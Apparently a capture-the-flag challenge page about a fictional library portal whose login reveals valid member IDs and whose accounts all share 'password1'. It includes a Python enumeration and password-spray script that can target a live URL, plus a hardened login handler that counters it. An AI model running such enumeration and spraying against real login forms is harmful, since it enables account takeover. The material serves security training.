WEBVERSE

Tags: easy, Auth, Free

Pinegrass Library Co-op

A small community library's member portal. The login form is quite clear about which mistakes you've made. The members, meanwhile, all share a password they were given in 2014.

The Scenario

Pinegrass has been a member-funded library co-op since 1962. The online portal was set up by Cyrus, the volunteer IT person, who picked a "temporary" password for every staff member's account so they could each log in once and change it. None of them did. The login form, separately, was written by a copy editor who made the error messages clearer than is good for them.

Challenge Intel

Synopsis

The login form returns different error messages for valid and invalid member IDs (username enumeration). Every member account uses the same weak password, `password1`. Enumerate the roster, then spray that one password across all valid member IDs; every successful login lands on a dashboard that renders the flag.

What It Is

Two compounding flaws. (1) POST /login differentiates "Password incorrect for member {id}" (echoes the id back when the member exists) vs "We don't have a member by that name" (when it doesn't). The /about page lists 10 staff with full names; those map to seeded member accounts as firstinitial+lastname. (2) Every one of those 10 accounts shares the password `password1` — set by the IT volunteer as a "temporary default" in 2014 and never rotated. Sprays succeed on any enumerated account; the flag is rendered on every dashboard as the "Member reconciliation reference" row.
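Both steps as a script, added here as an example rather than code from the challenge. The two error strings are the ones quoted above; everything else is an assumption: the staff names are constructed stand-ins for the /about roster, the POST field names `member_id` and `password` are guessed, and `fake_login` is an offline imitation of the vulnerable portal so the script runs without the target. Swap `fake_login` for `http_login("https://<target>")` to point it at the real form.

```python
"""Username enumeration via differential error messages, then a one-password
spray.  Added example, not the challenge's code.  Assumed: the names below,
the form field names, and the dashboard markup of the offline stand-in."""
import urllib.error
import urllib.parse
import urllib.request

# Constructed roster standing in for the ten names on /about (not the real page).
STAFF_NAMES = ["Cyrus Okonkwo", "Dana Vreeland", "Mei Lindqvist",
               "Tomas Ferreira", "Priya Raman"]

UNKNOWN_MSG = "We don't have a member by that name"      # quoted in the write-up
WRONG_PW_PREFIX = "Password incorrect for member "       # quoted in the write-up


def member_ids(full_names):
    """Seeding rule from the write-up: first initial + last name, lowercased."""
    return [(n.split()[0][0] + n.split()[-1]).lower() for n in full_names]


def classify(body):
    """Map a /login response body to 'invalid', 'valid' or 'success'."""
    if UNKNOWN_MSG in body:
        return "invalid"
    if WRONG_PW_PREFIX in body:
        return "valid"          # account exists; only the password was wrong
    return "success"            # anything else means we got past the form


def enumerate_members(login, candidates, probe="not-the-password-xyz"):
    """Keep every candidate whose error is not the 'unknown member' one."""
    return [c for c in candidates if classify(login(c, probe)) != "invalid"]


def spray(login, ids, password):
    """One password across many accounts; returns the IDs that reached a dashboard."""
    return [m for m in ids if classify(login(m, password)) == "success"]


def http_login(base_url):
    """Transport for a live target (assumed field names 'member_id'/'password')."""
    def login(member_id, password):
        data = urllib.parse.urlencode(
            {"member_id": member_id, "password": password}).encode()
        req = urllib.request.Request(base_url + "/login", data=data, method="POST")
        try:
            with urllib.request.urlopen(req) as resp:   # follows the success redirect
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:              # a 4xx still carries the message
            return e.read().decode(errors="replace")
    return login


# Constructed stand-in for the vulnerable portal so the script runs offline.
_SEEDED = {mid: "password1" for mid in member_ids(STAFF_NAMES)}


def fake_login(member_id, password):
    if member_id not in _SEEDED:
        return UNKNOWN_MSG
    if _SEEDED[member_id] != password:
        return WRONG_PW_PREFIX + member_id          # echoes the ID back: the oracle
    return ("<h1>Member dashboard</h1><tr><td>Member reconciliation reference</td>"
            "<td>(flag rendered here)</td></tr>")


if __name__ == "__main__":
    # A couple of guesses that should not exist, to show the oracle filtering them out.
    candidates = member_ids(STAFF_NAMES) + ["nobody", "admin"]
    valid = enumerate_members(fake_login, candidates)
    print("valid member IDs:", valid)
    print("spray hits with password1:", spray(fake_login, valid, "password1"))
```

The enumeration probe uses a password that is certainly wrong, so each candidate costs exactly one request and the only thing inspected is which of the two error strings comes back. The spray then sends the single shared credential once per enumerated ID, so no account sees more than two failed attempts in total.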

Who It's For

Players ready to combine two cheap techniques — username enumeration off the public site copy, then a password spray of one weak credential. No tooling required; curl is enough.

Skills You'll Practice

  • Username enumeration via differential error messages
  • Password spraying — one password across many accounts
  • Treating public copy as the enumeration wordlist

What You'll Gain

  • Login errors must not differentiate between 'unknown user' and 'wrong password'; response timing and size must not differ either, since those are the next oracle an attacker checks
  • Shared / default passwords across an org are catastrophic — sprays land before any single account locks
  • Per-account first-login resets are not optional
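The three lessons above as a hardened login handler, added here as an example and not the co-op's or the challenge's code. The account store, thresholds, source identifier and message text are assumptions. It returns one generic message for unknown IDs and wrong passwords, verifies a dummy hash when the ID is unknown so the two cases cost the same time, refuses to land any account still carrying its seeded default on a dashboard until the owner sets a new password, and counts failures per source across distinct accounts, which is the shape a spray has and a per-account lockout never sees.

```python
"""Hardened portal login: uniform failure message, dummy-hash verification for
unknown IDs, forced first-login reset, and a per-source spray detector.
Added example; store layout, thresholds and messages are assumptions."""
import hashlib
import hmac
import os
from collections import defaultdict

GENERIC = "Member ID or password is incorrect"
RESET_MSG = "Choose a new password to continue"
ITERATIONS = 20_000   # kept low so the demo is quick; use a much higher count in production


def hash_pw(password, salt=None):
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Verified whenever the member ID is unknown, so timing does not reveal existence.
_DUMMY_SALT, _DUMMY_HASH = hash_pw(os.urandom(16).hex())


def seed_account(password, must_reset=True):
    """Seeded accounts start with must_reset=True: the default never reaches the dashboard."""
    salt, digest = hash_pw(password)
    return {"salt": salt, "hash": digest, "must_reset": must_reset}


class Portal:
    def __init__(self, accounts, window=300, max_distinct=5):
        self.accounts = accounts              # member_id -> record from seed_account()
        self.window = window                  # seconds of failure history considered
        self.max_distinct = max_distinct      # distinct accounts one source may fail against
        self.failures = defaultdict(list)     # source -> [(timestamp, member_id)]

    def sprayed(self, source, now):
        """Spray signature: one source failing against many different accounts."""
        recent = {m for t, m in self.failures[source] if now - t <= self.window}
        return len(recent) >= self.max_distinct

    def login(self, member_id, password, source, now):
        """Returns (status, message); status is one of blocked/fail/reset_required/ok."""
        if self.sprayed(source, now):
            return "blocked", GENERIC
        rec = self.accounts.get(member_id)
        salt, stored = (rec["salt"], rec["hash"]) if rec else (_DUMMY_SALT, _DUMMY_HASH)
        _, candidate = hash_pw(password, salt)         # same work whether or not rec exists
        ok = hmac.compare_digest(candidate, stored) and rec is not None
        if not ok:
            self.failures[source].append((now, member_id))
            return "fail", GENERIC                     # identical for unknown ID and wrong password
        if rec["must_reset"]:
            return "reset_required", RESET_MSG         # the 2014 default gets you only to a reset form
        return "ok", "dashboard"


if __name__ == "__main__":
    # Constructed store: three seeded staff accounts still on the shared default.
    portal = Portal({m: seed_account("password1") for m in ["cokonkwo", "dvreeland", "mlindqvist"]})
    print(portal.login("nobody", "password1", "10.0.0.9", now=0))     # ('fail', GENERIC)
    print(portal.login("cokonkwo", "wrong", "10.0.0.9", now=1))       # ('fail', GENERIC)
    print(portal.login("cokonkwo", "password1", "10.0.0.9", now=2))   # ('reset_required', ...)
```

Keying the detector on the source rather than the account is the point: a spray of one password across ten accounts produces at most one failure per account, which no per-account lockout will ever trip, but five distinct accounts failing from one source inside the window is unmistakable.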

Ready to hack Pinegrass Library Co-op?

This challenge is free. Sign up and start hacking.